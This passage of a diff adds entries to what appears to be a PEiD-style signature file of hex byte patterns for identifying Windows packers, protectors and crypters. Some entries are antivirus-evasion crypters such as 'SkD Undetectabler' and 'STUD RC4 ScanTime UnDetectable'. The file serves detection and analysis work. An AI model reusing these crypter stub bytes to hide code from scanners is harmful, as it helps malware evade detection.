+signature = 57 57 8D 7C 24 04 50 B8 00 ?? ?? ?? AB 58 5F C3
+ep_only = true
+
+[SimbiOZ Poly 2.1 -> Extranger]
+signature = 55 50 8B C4 83 C0 04 C7 00 ?? ?? ?? ?? 58 C3 90
+ep_only = true
+
+[SimbiOZ PolyCryptor v.xx-> Extranger]
+signature = 55 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8
+ep_only = true
+
+[Simple UPX Cryptor V30.4.2005 -> MANtiCORE]
+signature = 60 B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? ?? ?? ?? ?? E2 FA 61 68 ?? ?? ?? ?? C3
+ep_only = true
+
+[Simple UPX Cryptor v30.4.2005 [multi layer encryption] --> MANtiCORE]
+signature = 60 B8 ?? ?? ?? 00 B9 18 00 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3
+ep_only = true
+
+[Simple UPX Cryptor v30.4.2005 [multi layer encryption] --> MANtiCORE]
+signature = 60 B8 ?? ?? ?? ?? B9 18 00 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? ?? C3
+ep_only = true
+
+[Simple UPX Cryptor v30.4.2005 [One layer encryption] --> MANtiCORE]
+signature = 60 B8 ?? ?? ?? 00 B9 ?? 01 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3
+ep_only = true
+
+[SimplePack 1.0X -> bagie]
+signature = 60 E8 00 00 00 00 5B 8D 5B FA 6A 00 FF 93 ?? ?? 00 00 89 C5 8B 7D 3C 8D 74 3D 00 8D BE F8 00 00 00 8B 86 88 00 00 00 09 C0
+ep_only = true
+
+[SimplePack 1.11 Method 1 -> bagie[TMX]]
+signature = 60 E8 00 00 00 00 5B 8D 5B FA BD 00 00 ?? ?? 8B 7D 3C 8D 74 3D 00 8D BE F8 00 00 00 0F B7 76 06 4E 8B 47 10 09 C0 74 55 0F B7 47 22 09 C0 74 4D 6A 04 68 00 10 00 00 FF 77 10 6A 00 FF 93 38 03 00 00 50 56 57 89 EE 03 77 0C 8B 4F 10 89 C7 89 C8 C1 E9 02 FC
+ep_only = true
+
+[SimplePack 1.11 Method 1 -> bagie[TMX]]
+signature = 60 E8 00 00 00 00 5B 8D 5B FA BD 00 00 ?? ?? 8B 7D 3C 8D 74 3D 00 8D BE F8 00 00 00 0F B7 76 06 4E 8B 47 10 09 C0 74 55 0F B7 47 22 09 C0 74 4D 6A 04 68 00 10 00 00 FF 77 10 6A 00 FF 93 38 03 00 00 50 56 57 89 EE 03 77 0C 8B 4F 10 89 C7 89 C8 C1 E9 02 FC F3 A5 89 C1 83 E1 03 F3 A4 5F 5E 8B 04 24 89 EA 03 57 0C E8 3F 01 00 00 58 68 00 40 00 00 FF 77 10 50 FF 93 3C 03 00 00 83 C7 28 4E 75 9E BE ?? ?? ?? ?? 09 F6 0F 84 0C 01 00 00 01 EE 8B 4E 0C 09 C9 0F 84 FF 00 00 00 01 E9 89 CF 57 FF 93 30 03 00 00 09 C0 75 3D 6A 04 68 00 10 00 00 68 00 10 00 00 6A 00 FF 93 38 03 00 00 89 C6 8D 83 6F 02 00 00 57 50 56 FF 93 44 03 00 00 6A 10 6A 00 56 6A 00 FF 93 48 03 00 00 89 E5
+ep_only = true
+
+[SimplePack 1.11 Method 2(NT) -> bagie[TMX]]
+signature = 4D 5A 90 EB 01 00 52 E9 89 01 00 00 50 45 00 00 4C 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 0F 03 0B 01
+ep_only = true
+
+[SimplePack 1.2.build.30.09 (Method2) -> bagie]
+signature = 4D 5A 90 EB 01 00 52 E9 86 01 00 00 50 45 00 00 4C 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 0F 03 0B 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0C 00 00 00 00 ?? ?? ?? 00 10 00 00 00 02 00 00 01 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00
+ep_only = false
+
+[SimplePack 1.21.build.09.09 (Method2) -> bagie]
+signature = 4D 5A 90 EB 01 00 52 E9 8A 01 00 00 50 45 00 00 4C 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 0F 03 0B 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0C 00 00 00 00 ?? ?? ?? 00 10 00 00 00 02 00 00 01 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00
+ep_only = false
+
+[SimplePack 1.X (Method2) -> bagie]
+signature = 4D 5A 90 EB 01 00 52 E9 ?? 01 00 00 50 45 00 00 4C 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 0F 03 0B 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0C 00 00 00 00 ?? ?? ?? 00 10 00 00 00 02 00 00 01 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00
+ep_only = false
+
+[SimplePack V1.1X (Method2) -> bagie]
+signature = 4D 5A 90 EB 01 00 52 E9 89 01 00 00 50 45 00 00 4C 01 02 00
+ep_only = false
+
+[SimplePack V1.1X (Method2) -> bagie]
+signature = 4D 5A 90 EB 01 00 52 E9 89 01 00 00 50 45 00 00 4C 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 0F 03 0B 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0C 00 00 00 00 ?? ?? ?? 00 10 00 00 00 02 00 00 01 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00
+ep_only = false
+
+[SimplePack V1.1X-V1.2X (Method1) -> bagie]
+signature = 60 E8 00 00 00 00 5B 8D 5B FA BD ?? ?? ?? ?? 8B 7D 3C 8D 74 3D 00 8D BE F8 00 00 00 0F B7 76 06 4E 8B 47 10 09 C0
+ep_only = true
+
+[SkD Undetectabler 3 (No FSG 2 Method) -> SkD]
+signature = 55 8B EC 81 EC 10 02 00 00 68 00 02 00 00 8D 85 F8 FD FF FF 50 6A 00 FF 15 38 10 00 01 50 FF 15 3C 10 00 01 8D 8D F8 FD FF FF 51 E8 4F FB FF FF 83 C4 04 8B 15 ?? 16 00 01 52 A1 ?? 16 00 01 50 E8 50 FF FF FF 83 C4 08 A3 ?? 16 00 01 C7 85 F4 FD FF FF 00 00 00 00 EB 0F 8B 8D F4 FD FF FF 83 C1 01 89 8D F4 FD FF FF 8B 95 F4 FD FF FF 3B 15 ?? 16 00 01 73 1C 8B 85 F4 FD FF FF 8B 0D ?? 16 00 01 8D 54 01 07 81 FA 74 10 00 01 75 02 EB 02 EB C7 8B 85 F4 FD FF FF 50 E8 ?? 00 00 00 83 C4 04 89 85 F0 FD FF FF 8B 8D F0 FD FF FF 89 4D FC C7 45 F8 00 00 00 00 EB 09 8B 55 F8 83 C2 01 89 55 F8 8B 45 F8 3B 85 F4 FD FF FF 73 15 8B 4D FC 03 4D F8 8B 15 ?? 16 00 01 03 55 F8 8A 02 88 01 EB D7 83 3D ?? 16 00 01 00 74
+ep_only = true
+
+[SkD Undetectabler Pro 2.0 (No UPX Method) -> SkD]
+signature = 55 8B EC 83 C4 F0 B8 FC 26 00 10 E8 EC F3 FF FF 6A 0F E8 15 F5 FF FF E8 64 FD FF FF E8 BB ED FF FF 8D 40
+ep_only = true
+
+[SLVc0deProtector 0.60 -> SLV / ICU]
+signature = EB 02 FA 04 E8 49 00 00 00 69 E8 49 00 00 00 95 E8 4F 00 00 00 68 E8 1F 00 00 00 49 E8 E9 FF FF FF 67 E8 1F 00 00 00 93 E8 31 00 00 00 78 E8 DD
+ep_only = false
+
+[SLVc0deProtector 1.1x -> SLV / ICU]
+signature = E8 00 00 00 00 58 C6 00 EB C6 40 01 08 FF E0 E9 4C ?? ?? 00
+ep_only = true
+
+[SLVc0deProtector v0.6 -> SLV]
+signature = ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 49 00 00 00 69 E8 49 00 00 00 95 E8 4F 00 00 00 68 E8 1F 00 00 00 49 E8 E9 FF FF FF 67 E8 1F 00 00 00 93 E8 31 00 00 00 78 E8 DD FF FF FF 38 E8 E3 FF FF FF 66 E8 0D 00 00 00 04 E8 E3 FF FF FF 70 E8 CB FF FF FF 69 E8 DD FF FF FF 58 E8 DD FF FF FF 69 E8 E3 FF FF FF 79 E8 BF FF FF FF 69 83 C4 40 E8 00 00 00 00 5D 81 ED 97 11 40 00 8D B5 EF 11 40 00 B9 FE 2D 00 00 8B FE AC F8 ?? ?? ?? ?? ?? ?? 90
+ep_only = true
+
+[SLVc0deProtector v0.61 -> SLV]
+signature = ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB 02 FA 04 E8 49 00 00 00 69 E8 49 00 00 00 95 E8 4F 00 00 00 68 E8 1F 00 00 00 49 E8 E9 FF FF FF 67 E8 1F 00
+ep_only = true
+
+[SLVc0deProtector v0.61 -> SLV]
+signature = ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB 02 FA 04 E8 49 00 00 00 69 E8 49 00 00 00 95 E8 4F 00 00 00 68 E8 1F 00 00 00 49 E8 E9 FF FF FF 67 E8 1F 00 00 00 93 E8 31 00 00 00 78 E8 DD FF FF FF 38 E8 E3 FF FF FF 66 E8 0D 00 00 00 04 E8 E3 FF FF FF 70 E8 CB FF FF FF 69 E8 DD FF FF FF 58 E8 DD FF FF FF 69 E8 E3 FF FF FF 79 E8 BF FF FF FF 69 83 C4 40 E8 00 00 00 00 5D 81 ED 9D 11 40 00 8D 95 B4 11 40 00 E8 CB 2E 00 00 33 C0 F7 F0 69 8D B5 05 12 40 00 B9 5D 2E 00 00 8B FE AC
+ep_only = true
+
+[SLVc0deProtector v1.1 -> SLV]
+signature = E8 00 00 00 00 58 C6 00 EB C6 40 01 08 FF E0 E9 4C
+ep_only = true
+
+[SLVc0deProtector v1.1 -> SLV]
+signature = E8 01 00 00 00 A0 5D EB 01 69 81 ED 5F 1A 40 00 8D 85 92 1A 40 00 F3 8D 95 83 1A 40 00 8B C0 8B D2 2B C2 83 E8 05 89 42 01 E8 FB FF FF FF 69 83 C4 08 E8 06 00 00 00 69 E8 F2 FF FF FF F3 B9 05 00 00 00 51 8D B5 BF 1A 40 00 8B FE B9 58 15 00 00 AC 32 C1 F6
+ep_only = false
+
+[SmartE -> Microsoft]
+signature = EB 15 03 00 00 00 ?? 00 00 00 00 00 00 00 00 00 00 00 68 00 00 00 00 55 E8 00 00 00 00 5D 81 ED 1D 00 00 00 8B C5 55 60 9C 2B 85 8F 07 00 00 89 85 83 07 00 00 FF 74 24 2C E8 BB 01 00 00 0F 82 2F 06 00 00 E8 8E 04 00 00 49 0F 88 23 06
+ep_only = true
+
+[SmokesCrypt v1.2]
+signature = 60 B8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8A 14 08 80 F2 ?? 88 14 08 41 83 F9 ?? 75 F1
+ep_only = true
+
+[Soft Defender v1.0 - v1.1]
+signature = 74 07 75 05 19 32 67 E8 E8 74 1F 75 1D E8 68 39 44 CD ?? 59 9C 50 74 0A 75 08 E8 59 C2 04 ?? 55 8B EC E8 F4 FF FF FF 56 57 53 78 0F 79 0D E8 34 99 47 49 34 33 EF 31 34 52 47 23 68 A2 AF 47 01 59 E8 ?? ?? ?? ?? 58 05 BA 01 ?? ?? 03 C8 74 BE 75 BC E8
+ep_only = true
+
+[Soft Defender v1.1x -> Randy Li]
+signature = 74 07 75 05 ?? ?? ?? ?? ?? 74 1F 75 1D ?? 68 ?? ?? ?? 00 59 9C 50 74 0A 75 08 ?? 59 C2 04 00 ?? ?? ?? E8 F4 FF FF FF ?? ?? ?? 78 0F 79 0D
+ep_only = true
+
+[SoftComp 1.x -> BG Soft PT]
+signature = E8 00 00 00 00 81 2C 24 3A 10 41 00 5D E8 00 00 00 00 81 2C 24 31 01 00 00 8B 85 2A 0F 41 00 29 04 24 8B 04 24 89 85 2A 0F 41 00 58 8B 85 2A 0F 41 00
+ep_only = false
+
+[SoftDefender 1.x -> Randy Li]
+signature = 74 07 75 05 19 32 67 E8 E8 74 1F 75 1D E8 68 39 44 CD 00 59 9C 50 74 0A 75 08 E8 59 C2 04 00 55 8B EC E8 F4 FF FF FF 56 57 53 78 0F 79 0D E8 34 99 47 49 34 33 EF 31 34 52 47 23 68 A2 AF 47 01 59 E8 01 00 00 00 FF 58 05 E6 01 00 00 03 C8 74 BD 75 BB E8 00
+ep_only = true
+
+[SoftDefender V1.1x -> Randy Li]
+signature = 74 07 75 05 19 32 67 E8 E8 74 1F 75 1D E8 68 39 44
+ep_only = true
+
+[SoftProtect -> SoftProtect.by.ru]
+signature = EB 01 E3 60 E8 03 ?? ?? ?? D2 EB 0B 58 EB 01 48 40 EB 01 35 FF E0 E7 61 60 E8 03 ?? ?? ?? 83 EB 0E EB 01 0C 58 EB 01 35 40 EB 01 36 FF E0 0B 61 EB 01 83 9C EB 01 D5 EB 08 35 9D EB 01 89 EB 03 0B EB F7 E8 ?? ?? ?? ?? 58 E8 ?? ?? ?? ?? 59 83 01 01 80 39 5C
+ep_only = true
+
+[SoftProtect -> www.softprotect.by.ru]
+signature = E8 ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? C7 00 00 00 00 00 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 ?? ?? ?? ?? ?? 01
+ep_only = true
+
+[SoftSentry v2.11]
+signature = 55 8B EC 83 EC ?? 53 56 57 E9 50
+ep_only = true
+
+[SoftSentry v3.0]
+signature = 55 8B EC 83 EC ?? 53 56 57 E9 B0 06
+ep_only = true
+
+[Software Compress -> BG Software]
+signature = E9 BE 00 00 00 60 8B 74 24 24 8B 7C 24 28 FC B2 80 33 DB A4 B3 02 E8 6D 00 00 00 73 F6 33 C9 E8 64 00 00 00 73 1C 33 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 12 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 2B CB 75 10 E8 42 00 00 00 EB 28 AC D1 E8
+ep_only = true
+
+[Software Compress V1.2 -> BG Software Protect Technologies]
+signature = E9 BE 00 00 00 60 8B 74 24 24 8B 7C 24 28 FC B2 80 33 DB A4 B3 02 E8 6D 00 00
+ep_only = true
+
+[Software Compress v1.2 -> BG Software Protect Technologies]
+signature = E9 BE 00 00 00 60 8B 74 24 24 8B 7C 24 28 FC B2 80 33 DB A4 B3 02 E8 6D 00 00 00 73 F6 33 C9 E8 64 00 00 00 73 1C 33 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 12 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 2B CB 75 10 E8 42 00 00 00 EB 28 AC D1 E8 74 4D 13 C9 EB 1C 91 48 C1 E0 08 AC E8 2C 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 8E 02 D2 75 05 8A 16 46 12 D2 C3 33 C9 41 E8 EE FF FF FF 13 C9 E8 E7 FF FF FF 72 F2 C3 2B 7C 24 28 89 7C 24 1C 61 C3 60 FF 74 24 24 6A 40 FF 95 1A 0F 41 00 89 44 24 1C 61 C2 04 00 E8 00 00 00 00 81 2C 24 3A 10 41 00 5D E8 00 00 00 00 81 2C 24 31 01 00 00 8B 85 2A 0F 41 00 29 04 24
+ep_only = true
+
+[Software Compress v1.4 LITE -> BG Software Protect Technologies]
+signature = E8 00 00 00 00 81 2C 24 AA 1A 41 00 5D E8 00 00 00 00 83 2C 24 6E 8B 85 5D 1A 41 00 29 04 24 8B 04 24 89 85 5D 1A 41 00 58 8B 85 5D 1A 41 00 8B 50 3C 03 D0 8B 92 80 00 00 00 03 D0 8B 4A 58 89 8D 49 1A 41 00 8B 4A 5C 89 8D 4D 1A 41 00 8B 4A 60 89 8D 55 1A
+ep_only = true
+
+[Software Compress v1.4 LITE -> BG Software Protect Technologies]
+signature = E8 00 00 00 00 81 2C 24 AA 1A 41 00 5D E8 00 00 00 00 83 2C 24 6E 8B 85 5D 1A 41 00 29 04 24 8B 04 24 89 85 5D 1A 41 00 58 8B 85 5D 1A 41 00 8B 50 3C 03 D0 8B 92 80 00 00 00 03 D0 8B 4A 58 89 8D 49 1A 41 00 8B 4A 5C 89 8D 4D 1A 41 00 8B 4A 60 89 8D 55 1A 41 00 8B 4A 64 89 8D 51 1A 41 00 8B 4A 74 89 8D 59 1A 41 00 68 00 20 00 00 E8 D2 00 00 00 50 8D 8D 00 1C 41 00 50 51 E8 1B 00 00 00 83 C4 08 58 8D 78 74 8D B5 49 1A 41 00 B9 18 00 00 00 F3 A4 05 A4 00 00 00 50 C3 60 8B 74 24 24 8B 7C 24 28 FC B2 80 33 DB A4 B3 02 E8 6D 00 00 00 73 F6 33 C9 E8 64 00 00 00 73 1C 33 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 12 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 2B CB 75 10 E8 42 00 00 00 EB 28 AC D1 E8 74 4D 13 C9 EB 1C 91 48 C1 E0 08 AC E8 2C 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 8E 02 D2 75 05 8A 16 46 12 D2 C3 33 C9 41 E8 EE FF FF FF 13 C9 E8 E7 FF FF FF 72 F2 C3 2B 7C 24 28 89 7C 24 1C 61 C3 60 FF 74 24 24 6A 40 FF 95 4D 1A 41 00 89 44 24 1C 61 C2 04
+ep_only = true
+
+[SoftWrap]
+signature = 52 53 51 56 57 55 E8 ?? ?? ?? ?? 5D 81 ED 36 ?? ?? ?? E8 ?? 01 ?? ?? 60 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F
+ep_only = true
+
+[SOFTWrapper for Win9x/NT (Evaluation Version)]
+signature = E8 00 00 00 00 5D 8B C5 2D ?? ?? ?? 00 50 81 ED 05 00 00 00 8B C5 2B 85 03 0F 00 00 89 85 03 0F 00 00 8B F0 03 B5 0B 0F 00 00 8B F8 03 BD 07 0F 00 00 83 7F 0C 00 74 2B 56 57 8B 7F 10 03 F8 8B 76 10 03 F0 83 3F 00 74 0C 8B 1E 89 1F 83 C6 04 83 C7 04 EB EF
+ep_only = true
+
+[SPEC b2]
+signature = 55 57 51 53 E8 ?? ?? ?? ?? 5D 8B C5 81 ED ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 83 E8 09 89 85 ?? ?? ?? ?? 0F B6
+ep_only = true
+
+[SPEC b3]
+signature = 5B 53 50 45 43 5D E8 ?? ?? ?? ?? 5D 8B C5 81 ED 41 24 40 ?? 2B 85 89 26 40 ?? 83 E8 0B 89 85 8D 26 40 ?? 0F B6 B5 91 26 40 ?? 8B FD
+ep_only = true
+
+[Special EXE Password Protector v1.0]
+signature = 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 89 AD 8C 01 00 00 8B C5 2B 85 FE 75 00 00 89 85 3E 77
+ep_only = true
+
+[Special EXE Pasword Protector V1.01 (Eng) -> Pavol Cerven]
+signature = 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 89 AD 8C 01 00 00 8B C5 2B 85 FE 75 00 00 89 85 3E
+ep_only = true
+
+[Special EXE Pasword Protector v1.01 (Eng) -> Pavol Cerven]
+signature = 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 89 AD 8C 01 00 00 8B C5 2B 85 FE 75 00 00 89 85 3E 77 00 00 8D 95 C6 77 00 00 8D 8D FF 77 00 00 55 68 00 20 00 00 51 52 6A 00 FF 95 04 7A 00 00 5D 6A 00 FF 95 FC 79 00 00 8D 8D 60 78 00 00 8D 95 85 01 00 00 55 68 00
+ep_only = true
+
+[Splash Bitmap v1.00 (With Unpack Code) --> BoB / Bobsoft]
+signature = E8 00 00 00 00 60 8B 6C 24 20 55 81 ED ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 29 F9 31 C0 FC F3 AA 8B 04 24 48 66 25 00 F0 66 81 38 4D 5A 75 F4 8B 48 3C 81 3C 01 50 45 00 00 75 E8 89 85 ?? ?? ?? ?? 6A 40
+ep_only = true
+
+[Splash Bitmap v1.00 --> BoB / Bobsoft]
+signature = E8 00 00 00 00 60 8B 6C 24 20 55 81 ED ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 29 F9 31 C0 FC F3 AA 8B 04 24 48 66 25 00 F0 66 81 38 4D 5A 75 F4 8B 48 3C 81 3C 01 50 45 00 00 75 E8 89 85 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 6A 00
+ep_only = true
+
+[Splasher v1.0 - v3.0]
+signature = 9C 60 8B 44 24 24 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 50 E8 ED 02 ?? ?? 8C C0 0F 84
+ep_only = true
+
+[SPLayer v0.08]
+signature = 8D 40 00 B9 ?? ?? ?? ?? 6A ?? 58 C0 0C ?? ?? 48 ?? ?? 66 13 F0 91 3B D9 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00
+ep_only = false
+
+[Splice 1.1 - by Tw1sted L0gic]
+signature = 68 00 1A 40 00 E8 EE FF FF FF 00 00 00 00 00 00 30 00 00 00 40 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 01 00 00 00 ?? ?? ?? ?? ?? ?? 50 72 6F 6A 65 63 74 31 00 ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 06 00 00 00 AC 29 40 00 07 00 00 00 BC 28 40 00 07 00 00 00 74 28 40 00 07 00 00 00 2C 28 40 00 07 00 00 00 08 23 40 00 01 00 00 00 38 21 40 00 00 00 00 00 FF FF FF FF FF FF FF FF 00 00 00 00 8C 21 40 00 08 ?? 40 00 01 00 00 00 AC 19 40 00 00 00 00 00 00 00 00 00 00 00 00 00 AC 19 40 00 4F 00 43 00 50 00 00 00 E7 AF 58 2F 9A 4C 17 4D B7 A9 CA 3E 57 6F F7 76
+ep_only = true
+
+[ST Protector V1.5 -> Silent Software]
+signature = 00 00 00 00 4B 65 52 6E 45 6C 33 32 2E 64 4C 6C 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00
+ep_only = false
+
+[StarForce 3.0 -> StarForce Technology]
+signature = 68 ?? ?? ?? ?? FF 25 ?? ?? 63
+ep_only = true
+
+[StarForce ProActive 1.1 -> StarForce Technology]
+signature = 68 ?? ?? ?? ?? FF 25 ?? ?? 57
+ep_only = true
+
+[StarForce Protection Driver -> Protection Technology]
+signature = 57 68 ?? 0D 01 00 68 00 ?? ?? 00 E8 50 ?? FF FF 68 ?? ?? ?? 00 68 ?? ?? ?? 00 68 ?? ?? ?? 00 68 ?? ?? ?? 00 68 ?? ?? ?? 00
+ep_only = true
+
+[StarForce V1.X-V3.X -> StarForce Copy Protection System]
+signature = 68 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? 00 00 00 00 00
+ep_only = true
+
+[StarForce V3.X DLL -> StarForce Copy Protection System]
+signature = E8 ?? ?? ?? ?? 00 00 00 00 00 00
+ep_only = true
+
+[Ste@lth PE 1.01 -> BGCorp]
+signature = ?? ?? ?? ?? ?? BA ?? ?? ?? 00
+ep_only = true
+
+[Stealth PE v1.1]
+signature = BA ?? ?? ?? 00 FF E2 BA ?? ?? ?? 00 B8 ?? ?? ?? ?? 89 02 83 C2 03 B8 ?? ?? ?? ?? 89 02 83 C2 FD FF E2
+ep_only = true
+
+[STNPEE 1.13]
+signature = 55 57 56 52 51 53 E8 00 00 00 00 5D 8B D5 81 ED 97 3B 40 00
+ep_only = true
+
+[Stone's PE Encryptor v1.0]
+signature = 55 57 56 52 51 53 E8 ?? ?? ?? ?? 5D 8B D5 81 ED 63 3A 40 ?? 2B 95 C2 3A 40 ?? 83 EA 0B 89 95 CB 3A 40 ?? 8D B5 CA 3A 40 ?? 0F B6 36
+ep_only = true
+
+[Stone's PE Encryptor v1.13]
+signature = 55 57 56 52 51 53 E8 ?? ?? ?? ?? 5D 8B D5 81 ED 97 3B 40 ?? 2B 95 2D 3C 40 ?? 83 EA 0B 89 95 36 3C 40 ?? 01 95 24 3C 40 ?? 01 95 28
+ep_only = true
+
+[Stone's PE Encryptor v2.0]
+signature = 53 51 52 56 57 55 E8 ?? ?? ?? ?? 5D 81 ED 42 30 40 ?? FF 95 32 35 40 ?? B8 37 30 40 ?? 03 C5 2B 85 1B 34 40 ?? 89 85 27 34 40 ?? 83
+ep_only = true
+
+[Stone`s PE Encruptor v1.13]
+signature = 55 57 56 52 51 53 E8 ?? ?? ?? ?? 5D 8B D5 81
+ep_only = true
+
+[STUD RC4 1.0 Jamie Edition (ScanTime UnDetectable) - by MarjinZ]
+signature = 68 2C 11 40 00 E8 F0 FF FF FF 00 00 00 00 00 00 30 00 00 00 38 00 00 00 00 00 00 00 37 BB 71 EC A4 E1 98 4C 9B FE 8F 0F FA 6A 07 F6 00 00 00 00 00 00 01 00 00 00 20 20 46 6F 72 20 73 74 75 64 00 20 54 6F 00 00 00 00 06 00 00 00 CC 1A 40 00 07 00 00 00 D4 18 40 00 07 00 00 00 7C 18 40 00 07 00 00 00 2C 18 40 00 07 00 00 00 E0 17 40 00 56 42 35 21 F0 1F 2A 00 00 00 00 00 00 00 00 00 00 00 00 00 7E 00 00 00 00 00 00 00 00 00 00 00 00 00 0A 00 09 04 00 00 00 00 00 00 E8 13 40 00 F4 13 40 00 00 F0 30 00 00 FF FF FF 08 00 00 00 01 00 00 00 00 00 00 00 E9 00 00 00 04 11 40 00 04 11 40 00 C8 10 40 00 78 00 00 00 7C 00 00 00 81 00 00 00 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 61 61 00 53 74 75 64 00 00 73 74 75 64 00 00 01 00 01 00 30 16 40 00 00 00 00 00 FF FF FF FF FF FF FF FF 00 00 00 00 B4 16 40 00 10 30 40 00 07 00 00 00 24 12 40 00 0E 00 20 00 00 00 00 00 1C 9E 21 00 EC 11 40 00 5C 10 40 00 E4 1A 40 00 2C 34 40 00 68 17 40 00 58 17 40 00 78 17 40 00 8C 17 40 00 8C 10 40 00 62 10 40 00 92 10 40 00 F8 1A 40 00 24 19 40 00 98 10 40 00 9E 10 40 00 77 04 18 FF 04 1C FF 05 00 00 24 01 00 0D 14 00 78 1C 40 00 48 21 40 00
+ep_only = true
+
+[SuckStop v1.11]
+signature = EB ?? ?? ?? BE ?? ?? B4 30 CD 21 EB ?? 9B
+ep_only = true
+
+[SuperDAT]
+signature = 55 8B EC 6A FF 68 40 F3 42 00 68 A4 BF 42 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 08 F2 42 00 33 D2 8A D4 89 15 60 42 43 00 8B C8 81 E1 FF 00 00 00 89 0D
+ep_only = true
+
+[SVK Protector v1.32 (Eng) -> Pavol Cerven]
+signature = 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 EB 05 B8 06 36 42 00 64 A0 23 00 00 00 EB 03 C7 84 E8 84 C0 EB 03 C7 84 E9 75 67 B9 49 00 00 00 8D B5 C5 02 00 00 56 80 06 44 46 E2 FA 8B 8D C1 02 00 00 5E 55 51 6A 00 56 FF 95 0C 61 00 00 59 5D 40 85 C0 75 3C 80 3E
+ep_only = true
+
+[SVK Protector v1.3x (Eng) -> Pavol Cerven]
+signature = 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 EB 05 B8 ?? ?? 42 00 64 A0 23 00 00 00 EB 03 C7 84 E8 84 C0 EB 03 C7 84 E9 75 67 B9 49 00 00 00 8D B5 C5 02 00 00 56 80 06 44 46 E2 FA 8B 8D C1 02 00 00 5E 55 51 6A 00 56 FF 95 0C 61 00 00 59 5D 40 85 C0 75 3C 80 3E
+ep_only = true
+
+[SVK Protector V1.3X -> Pavol Cerven]
